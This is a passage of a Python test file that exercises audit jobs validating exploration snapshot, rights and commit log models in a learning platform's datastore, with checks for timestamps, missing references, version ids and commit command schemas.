                '1-1'))
        self.model_instance_2 = (
            exp_models.ExplorationSnapshotContentModel.get_by_id(
                '2-1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .ExplorationSnapshotContentModelAuditOneOffJob)
    def test_standard_operation(self):
        """Checks that valid models pass the audit; the title update adds a
        fourth snapshot (a second one for exploration '0').
        """
        exp_services.update_exploration(
            self.owner_id, '0', [exp_domain.ExplorationChange({
                'cmd': 'edit_exploration_property',
                'property_name': 'title',
                'new_value': 'New title'
            })], 'Changes.')
        expected_output = [
            u'[u\'fully-validated ExplorationSnapshotContentModel\', 4]']
        run_job_and_check_output(self, expected_output)
    def test_model_with_created_on_greater_than_last_updated(self):
        """Checks that created_on later than last_updated is flagged."""
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of ExplorationSnapshotContentModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'ExplorationSnapshotContentModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_last_updated_greater_than_current_time(self):
        """Checks that a last_updated in the future is flagged.

        NOTE(review): MockDatetime13Hours replaces datetime.datetime while
        the job runs — presumably shifting the job's notion of "now" so the
        surviving model's last_updated appears to be in the future; confirm
        against the mock's definition.
        """
        # Delete the other instances so only instance 0 is audited.
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'ExplorationSnapshotContentModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_exploration_model_failure(self):
        """Checks that snapshots referencing a deleted exploration fail the
        exploration_ids field check (deletion adds a second snapshot, so
        both 0-1 and 0-2 are reported).
        """
        exp_models.ExplorationModel.get_by_id('0').delete(self.owner_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for exploration_ids '
                'field check of ExplorationSnapshotContentModel\', '
                '[u"Entity id 0-1: based on field exploration_ids '
                'having value 0, expect model ExplorationModel with '
                'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
                'exploration_ids having value 0, expect model '
                'ExplorationModel with id 0 but it doesn\'t exist"]]'
            ), (
                u'[u\'fully-validated '
                'ExplorationSnapshotContentModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)
    def test_invalid_exploration_version_in_model_id(self):
        """Checks that a snapshot id claiming a version greater than the
        exploration's latest version is reported.
        """
        model_with_invalid_version_in_id = (
            exp_models.ExplorationSnapshotContentModel(
                id='0-3'))
        model_with_invalid_version_in_id.content = {}
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for exploration model '
                'version check of ExplorationSnapshotContentModel\', '
                '[u\'Entity id 0-3: Exploration model corresponding to '
                'id 0 has a version 1 which is less than '
                'the version 3 in snapshot content model id\']]'
            ), (
                u'[u\'fully-validated ExplorationSnapshotContentModel\', '
                '3]')]
        run_job_and_check_output(self, expected_output, sort=True)
class ExplorationRightsModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates
    ExplorationRightsModel instances.
    """
    def setUp(self):
        """Creates three explorations and assigns an editor on '0' and a
        viewer on '2', so the rights models carry user references for the
        field checks below.
        """
        super(ExplorationRightsModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.owner = user_services.UserActionsInfo(self.owner_id)
        editor_email = 'user@editor.com'
        viewer_email = 'user@viewer.com'
        self.signup(editor_email, 'editor')
        self.signup(viewer_email, 'viewer')
        self.editor_id = self.get_user_id_from_email(editor_email)
        self.viewer_id = self.get_user_id_from_email(viewer_email)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(3)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        rights_manager.assign_role_for_exploration(
            self.owner, '0', self.editor_id, rights_manager.ROLE_EDITOR)
        rights_manager.assign_role_for_exploration(
            self.owner, '2', self.viewer_id, rights_manager.ROLE_VIEWER)
        self.model_instance_0 = exp_models.ExplorationRightsModel.get_by_id('0')
        self.model_instance_1 = exp_models.ExplorationRightsModel.get_by_id('1')
        self.model_instance_2 = exp_models.ExplorationRightsModel.get_by_id('2')
        self.job_class = (
            prod_validation_jobs_one_off.ExplorationRightsModelAuditOneOffJob)
    def test_standard_operation(self):
        """Checks that valid rights models (including a published one) pass
        the audit.
        """
        rights_manager.publish_exploration(self.owner, '0')
        expected_output = [
            u'[u\'fully-validated ExplorationRightsModel\', 3]']
        run_job_and_check_output(self, expected_output)
    def test_model_with_created_on_greater_than_last_updated(self):
        """Checks that created_on later than last_updated is flagged.

        Rights models are saved via commit() with a system committer
        rather than a plain put().
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.commit(
            feconf.SYSTEM_COMMITTER_ID, 'created_on test', [])
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of ExplorationRightsModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), u'[u\'fully-validated ExplorationRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_last_updated_greater_than_current_time(self):
        """Checks that a last_updated in the future is flagged.

        NOTE(review): MockDatetime13Hours replaces datetime.datetime while
        the job runs — presumably shifting the job's notion of "now";
        confirm against the mock's definition.
        """
        self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        self.model_instance_2.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'ExplorationRightsModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_first_published_datetime_than_current_time(self):
        """Checks that a first_published_msec later than the job's run time
        is flagged.
        """
        rights_manager.publish_exploration(self.owner, '0')
        rights_manager.publish_exploration(self.owner, '1')
        # Scale the timestamp far into the future.
        self.model_instance_0.first_published_msec = (
            self.model_instance_0.first_published_msec * 1000000.0)
        self.model_instance_0.commit(feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for first published msec check '
                'of ExplorationRightsModel\', '
                '[u\'Entity id 0: The first_published_msec field has a '
                'value %s which is greater than the time when the job was '
                'run\']]'
            ) % (self.model_instance_0.first_published_msec),
            u'[u\'fully-validated ExplorationRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_exploration_model_failure(self):
        """Checks that a rights model whose exploration was deleted fails
        the exploration_ids field check.
        """
        exp_models.ExplorationModel.get_by_id('0').delete(
            feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for exploration_ids '
                'field check of ExplorationRightsModel\', '
                '[u"Entity id 0: based on field exploration_ids having '
                'value 0, expect model ExplorationModel with id 0 but '
                'it doesn\'t exist"]]'),
            u'[u\'fully-validated ExplorationRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_cloned_from_exploration_model_failure(self):
        """Checks that a cloned_from id with no matching exploration fails
        the cloned_from_exploration_ids field check.
        """
        self.model_instance_0.cloned_from = 'invalid'
        self.model_instance_0.commit(feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for '
                'cloned_from_exploration_ids '
                'field check of ExplorationRightsModel\', '
                '[u"Entity id 0: based on field cloned_from_exploration_ids '
                'having value invalid, expect model ExplorationModel with id '
                'invalid but it doesn\'t exist"]]'),
            u'[u\'fully-validated ExplorationRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_owner_user_model_failure(self):
        """Checks that an owner id without a UserSettingsModel fails the
        owner_user_ids field check.
        """
        rights_manager.assign_role_for_exploration(
            self.owner, '0', self.user_id, rights_manager.ROLE_OWNER)
        user_models.UserSettingsModel.get_by_id(self.user_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for owner_user_ids '
                'field check of ExplorationRightsModel\', '
                '[u"Entity id 0: based on field owner_user_ids having '
                'value %s, expect model UserSettingsModel with id %s '
                'but it doesn\'t exist"]]') % (self.user_id, self.user_id),
            u'[u\'fully-validated ExplorationRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_editor_user_model_failure(self):
        """Checks that an editor id without a UserSettingsModel fails the
        editor_user_ids field check.
        """
        user_models.UserSettingsModel.get_by_id(self.editor_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for editor_user_ids '
                'field check of ExplorationRightsModel\', '
                '[u"Entity id 0: based on field editor_user_ids having '
                'value %s, expect model UserSettingsModel with id %s but '
                'it doesn\'t exist"]]') % (
                    self.editor_id, self.editor_id),
            u'[u\'fully-validated ExplorationRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_viewer_user_model_failure(self):
        """Checks that a viewer id without a UserSettingsModel fails the
        viewer_user_ids field check (the viewer was assigned on '2').
        """
        user_models.UserSettingsModel.get_by_id(self.viewer_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for viewer_user_ids '
                'field check of ExplorationRightsModel\', '
                '[u"Entity id 2: based on field viewer_user_ids having '
                'value %s, expect model UserSettingsModel with id %s but '
                'it doesn\'t exist"]]') % (
                    self.viewer_id, self.viewer_id),
            u'[u\'fully-validated ExplorationRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_snapshot_metadata_model_failure(self):
        """Checks that a deleted rights snapshot metadata model fails the
        snapshot_metadata_ids field check.
        """
        exp_models.ExplorationRightsSnapshotMetadataModel.get_by_id(
            '0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_metadata_ids '
                'field check of ExplorationRightsModel\', '
                '[u"Entity id 0: based on field snapshot_metadata_ids having '
                'value 0-1, expect model '
                'ExplorationRightsSnapshotMetadataModel '
                'with id 0-1 but it doesn\'t exist"]]'
            ),
            u'[u\'fully-validated ExplorationRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_snapshot_content_model_failure(self):
        """Checks that a deleted rights snapshot content model fails the
        snapshot_content_ids field check.
        """
        exp_models.ExplorationRightsSnapshotContentModel.get_by_id(
            '0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_content_ids '
                'field check of ExplorationRightsModel\', '
                '[u"Entity id 0: based on field snapshot_content_ids having '
                'value 0-1, expect model ExplorationRightsSnapshotContentModel '
                'with id 0-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated ExplorationRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class ExplorationRightsSnapshotMetadataModelValidatorTests(
        test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates
    ExplorationRightsSnapshotMetadataModel instances.
    """
    def setUp(self):
        """Creates three explorations; exploration '0' is saved by the
        second user so its snapshot metadata references that committer.
        """
        super(ExplorationRightsSnapshotMetadataModelValidatorTests, self).setUp(
            )
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(3)]
        for exp in explorations:
            if exp.id != '0':
                exp_services.save_new_exploration(self.owner_id, exp)
            else:
                exp_services.save_new_exploration(self.user_id, exp)
        self.model_instance_0 = (
            exp_models.ExplorationRightsSnapshotMetadataModel.get_by_id(
                '0-1'))
        self.model_instance_1 = (
            exp_models.ExplorationRightsSnapshotMetadataModel.get_by_id(
                '1-1'))
        self.model_instance_2 = (
            exp_models.ExplorationRightsSnapshotMetadataModel.get_by_id(
                '2-1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .ExplorationRightsSnapshotMetadataModelAuditOneOffJob)
    def test_standard_operation(self):
        """Checks that valid snapshot metadata models pass the audit."""
        expected_output = [
            u'[u\'fully-validated ExplorationRightsSnapshotMetadataModel\', 3]']
        run_job_and_check_output(self, expected_output)
    def test_model_with_created_on_greater_than_last_updated(self):
        """Checks that created_on later than last_updated is flagged."""
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of ExplorationRightsSnapshotMetadataModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'ExplorationRightsSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_last_updated_greater_than_current_time(self):
        """Checks that a last_updated in the future is flagged.

        NOTE(review): MockDatetime13Hours replaces datetime.datetime while
        the job runs — presumably shifting the job's notion of "now";
        confirm against the mock's definition.
        """
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'ExplorationRightsSnapshotMetadataModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_exploration_rights_model_failure(self):
        """Checks that snapshots referencing deleted rights models fail the
        exploration_rights_ids field check (deletion adds a second
        snapshot, so both 0-1 and 0-2 are reported).
        """
        exp_models.ExplorationRightsModel.get_by_id('0').delete(
            self.user_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for exploration_rights_ids '
                'field check of ExplorationRightsSnapshotMetadataModel\', '
                '[u"Entity id 0-1: based on field exploration_rights_ids '
                'having value 0, expect model ExplorationRightsModel with '
                'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
                'exploration_rights_ids having value 0, expect model '
                'ExplorationRightsModel with id 0 but it doesn\'t exist"]]'
            ), (
                u'[u\'fully-validated '
                'ExplorationRightsSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_committer_model_failure(self):
        """Checks that a committer id without a UserSettingsModel fails the
        committer_ids field check.
        """
        user_models.UserSettingsModel.get_by_id(self.user_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for committer_ids field '
                'check of ExplorationRightsSnapshotMetadataModel\', '
                '[u"Entity id 0-1: based on field committer_ids having '
                'value %s, expect model UserSettingsModel with id %s '
                'but it doesn\'t exist"]]'
            ) % (self.user_id, self.user_id), (
                u'[u\'fully-validated '
                'ExplorationRightsSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)
    def test_invalid_exploration_version_in_model_id(self):
        """Checks that a snapshot id claiming a version greater than the
        rights model's latest version is reported.
        """
        model_with_invalid_version_in_id = (
            exp_models.ExplorationRightsSnapshotMetadataModel(
                id='0-3', committer_id=self.owner_id, commit_type='edit',
                commit_message='msg', commit_cmds=[{}]))
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for exploration rights model '
                'version check of ExplorationRightsSnapshotMetadataModel\', '
                '[u\'Entity id 0-3: ExplorationRights model corresponding to '
                'id 0 has a version 1 which is less than the version 3 in '
                'snapshot metadata model id\']]'
            ), (
                u'[u\'fully-validated '
                'ExplorationRightsSnapshotMetadataModel\', 3]')]
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_invalid_commit_cmd_schmea(self):
        """Checks that rights commit commands failing domain validation (a
        missing required attribute, or an extra one) are reported per
        command.
        """
        self.model_instance_0.commit_cmds = [{
            'cmd': 'change_exploration_status',
            'old_status': rights_manager.ACTIVITY_STATUS_PUBLIC,
        }, {
            'cmd': 'release_ownership',
            'invalid_attribute': 'invalid'
        }]
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit cmd '
                'change_exploration_status check of '
                'ExplorationRightsSnapshotMetadataModel\', '
                '[u"Entity id 0-1: Commit command domain validation '
                'for command: {u\'old_status\': u\'public\', '
                'u\'cmd\': u\'change_exploration_status\'} '
                'failed with error: The following required '
                'attributes are missing: new_status"]]'
            ), (
                u'[u\'failed validation check for commit cmd '
                'release_ownership check of '
                'ExplorationRightsSnapshotMetadataModel\', '
                '[u"Entity id 0-1: Commit command domain validation '
                'for command: {u\'cmd\': u\'release_ownership\', '
                'u\'invalid_attribute\': u\'invalid\'} '
                'failed with error: The following extra attributes '
                'are present: invalid_attribute"]]'
            ), (
                u'[u\'fully-validated '
                'ExplorationRightsSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)
class ExplorationRightsSnapshotContentModelValidatorTests(
        test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates
    ExplorationRightsSnapshotContentModel instances.
    """
    def setUp(self):
        """Creates three default explorations; saving each also creates its
        version-1 rights snapshot content model (id '<exploration id>-1').
        """
        super(ExplorationRightsSnapshotContentModelValidatorTests, self).setUp(
            )
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(3)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        self.model_instance_0 = (
            exp_models.ExplorationRightsSnapshotContentModel.get_by_id(
                '0-1'))
        self.model_instance_1 = (
            exp_models.ExplorationRightsSnapshotContentModel.get_by_id(
                '1-1'))
        self.model_instance_2 = (
            exp_models.ExplorationRightsSnapshotContentModel.get_by_id(
                '2-1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .ExplorationRightsSnapshotContentModelAuditOneOffJob)
    def test_standard_operation(self):
        """Checks that valid snapshot content models pass the audit."""
        expected_output = [
            u'[u\'fully-validated ExplorationRightsSnapshotContentModel\', 3]']
        run_job_and_check_output(self, expected_output)
    def test_model_with_created_on_greater_than_last_updated(self):
        """Checks that created_on later than last_updated is flagged."""
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of ExplorationRightsSnapshotContentModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'ExplorationRightsSnapshotContentModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_last_updated_greater_than_current_time(self):
        """Checks that a last_updated in the future is flagged.

        NOTE(review): MockDatetime13Hours replaces datetime.datetime while
        the job runs — presumably shifting the job's notion of "now";
        confirm against the mock's definition.
        """
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'ExplorationRightsSnapshotContentModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_exploration_model_failure(self):
        """Checks that snapshots referencing deleted rights models fail the
        exploration_rights_ids field check (deletion adds a second
        snapshot, so both 0-1 and 0-2 are reported).
        """
        exp_models.ExplorationRightsModel.get_by_id('0').delete(
            self.owner_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for exploration_rights_ids '
                'field check of ExplorationRightsSnapshotContentModel\', '
                '[u"Entity id 0-1: based on field exploration_rights_ids '
                'having value 0, expect model ExplorationRightsModel with '
                'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
                'exploration_rights_ids having value 0, expect model '
                'ExplorationRightsModel with id 0 but it doesn\'t exist"]]'
            ), (
                u'[u\'fully-validated '
                'ExplorationRightsSnapshotContentModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)
    def test_invalid_exploration_version_in_model_id(self):
        """Checks that a snapshot id claiming a version greater than the
        rights model's latest version is reported.
        """
        model_with_invalid_version_in_id = (
            exp_models.ExplorationRightsSnapshotContentModel(
                id='0-3'))
        model_with_invalid_version_in_id.content = {}
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for exploration rights model '
                'version check of ExplorationRightsSnapshotContentModel\', '
                '[u\'Entity id 0-3: ExplorationRights model corresponding to '
                'id 0 has a version 1 which is less than the version 3 in '
                'snapshot content model id\']]'
            ), (
                u'[u\'fully-validated ExplorationRightsSnapshotContentModel\', '
                '3]')]
        run_job_and_check_output(self, expected_output, sort=True)
class ExplorationCommitLogEntryModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates
    ExplorationCommitLogEntryModel instances.
    """
    def setUp(self):
        """Creates three explorations (each save writes a commit log entry
        with id 'exploration-<id>-<version>') plus one hand-built rights
        commit log entry with id 'rights-1-1'.
        """
        super(ExplorationCommitLogEntryModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(3)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        self.rights_model_instance = (
            exp_models.ExplorationCommitLogEntryModel(
                id='rights-1-1', user_id=self.owner_id,
                username=self.OWNER_USERNAME, exploration_id='1',
                commit_type='edit', commit_message='', commit_cmds=[],
                post_commit_status=constants.ACTIVITY_STATUS_PUBLIC,
                post_commit_community_owned=False,
                post_commit_is_private=False))
        self.rights_model_instance.put()
        self.model_instance_0 = (
            exp_models.ExplorationCommitLogEntryModel.get_by_id(
                'exploration-0-1'))
        self.model_instance_1 = (
            exp_models.ExplorationCommitLogEntryModel.get_by_id(
                'exploration-1-1'))
        self.model_instance_2 = (
            exp_models.ExplorationCommitLogEntryModel.get_by_id(
                'exploration-2-1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .ExplorationCommitLogEntryModelAuditOneOffJob)
    def test_standard_operation(self):
        """Checks that valid commit log entries pass the audit; the title
        update adds a fifth entry.
        """
        exp_services.update_exploration(
            self.owner_id, '0', [exp_domain.ExplorationChange({
                'cmd': 'edit_exploration_property',
                'property_name': 'title',
                'new_value': 'New title'
            })], 'Changes.')
        expected_output = [
            u'[u\'fully-validated ExplorationCommitLogEntryModel\', 5]']
        run_job_and_check_output(self, expected_output)
    def test_model_with_created_on_greater_than_last_updated(self):
        """Checks that created_on later than last_updated is flagged."""
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of ExplorationCommitLogEntryModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_last_updated_greater_than_current_time(self):
        """Checks that a last_updated in the future is flagged.

        NOTE(review): MockDatetime13Hours replaces datetime.datetime while
        the job runs — presumably shifting the job's notion of "now";
        confirm against the mock's definition.
        """
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        self.rights_model_instance.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'ExplorationCommitLogEntryModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_exploration_model_failure(self):
        """Checks that entries referencing a deleted exploration fail the
        exploration_ids field check (deletion adds a second entry, so both
        exploration-0-1 and exploration-0-2 are reported).
        """
        exp_models.ExplorationModel.get_by_id('0').delete(
            feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for exploration_ids '
                'field check of ExplorationCommitLogEntryModel\', '
                '[u"Entity id exploration-0-1: based on field '
                'exploration_ids having value 0, expect model '
                'ExplorationModel with id 0 '
                'but it doesn\'t exist", u"Entity id exploration-0-2: based '
                'on field exploration_ids having value 0, expect model '
                'ExplorationModel with id 0 but it doesn\'t exist"]]'
            ), u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_exploration_rights_model_failure(self):
        """Checks that a rights entry referencing a deleted rights model
        fails the exploration_rights_ids field check.
        """
        exp_models.ExplorationRightsModel.get_by_id('1').delete(
            feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for exploration_rights_ids '
                'field check of ExplorationCommitLogEntryModel\', '
                '[u"Entity id rights-1-1: based on field '
                'exploration_rights_ids having value 1, expect model '
                'ExplorationRightsModel with id 1 but it doesn\'t exist"]]'
            ), u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
        run_job_and_check_output(
            self, expected_output, sort=True)
    def test_invalid_exploration_version_in_model_id(self):
        """Checks that an entry id claiming a version greater than the
        exploration's latest version is reported.
        """
        model_with_invalid_version_in_id = (
            exp_models.ExplorationCommitLogEntryModel.create(
                '0', 3, self.owner_id, self.OWNER_USERNAME, 'edit',
                'msg', [{}],
                constants.ACTIVITY_STATUS_PUBLIC, False))
        model_with_invalid_version_in_id.exploration_id = '0'
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for exploration model '
                'version check of ExplorationCommitLogEntryModel\', '
                '[u\'Entity id %s: Exploration model corresponding '
                'to id 0 has a version 1 which is less than '
                'the version 3 in commit log entry model id\']]'
            ) % (model_with_invalid_version_in_id.id),
            u'[u\'fully-validated ExplorationCommitLogEntryModel\', 4]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_invalid_id(self):
        """Checks that an id not matching the expected pattern is reported
        (and that no commit cmd validation applies to the unknown prefix).
        """
        model_with_invalid_id = (
            exp_models.ExplorationCommitLogEntryModel(
                id='invalid-0-1', user_id=self.owner_id,
                username=self.OWNER_USERNAME, commit_type='edit',
                commit_message='msg', commit_cmds=[{}],
                post_commit_status=constants.ACTIVITY_STATUS_PUBLIC,
                post_commit_is_private=False))
        model_with_invalid_id.exploration_id = '0'
        model_with_invalid_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for model id check of '
                'ExplorationCommitLogEntryModel\', '
                '[u\'Entity id %s: Entity id does not match regex pattern\']]'
            ) % (model_with_invalid_id.id), (
                u'[u\'failed validation check for commit cmd check of '
                'ExplorationCommitLogEntryModel\', [u\'Entity id invalid-0-1: '
                'No commit command domain object defined for entity with '
                'commands: [{}]\']]'),
            u'[u\'fully-validated ExplorationCommitLogEntryModel\', 4]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_invalid_commit_type(self):
        """Checks that an unrecognized commit_type is reported."""
        self.model_instance_0.commit_type = 'invalid'
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit type check of '
                'ExplorationCommitLogEntryModel\', '
                '[u\'Entity id exploration-0-1: Commit type invalid is '
                'not allowed\']]'
            ), u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_invalid_post_commit_status(self):
        """Checks that an unrecognized post_commit_status is reported."""
        self.model_instance_0.post_commit_status = 'invalid'
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for post commit status check '
                'of ExplorationCommitLogEntryModel\', '
                '[u\'Entity id exploration-0-1: Post commit status invalid '
                'is invalid\']]'
            ), u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_invalid_true_post_commit_is_private(self):
        """Checks that post_commit_is_private=True contradicting a public
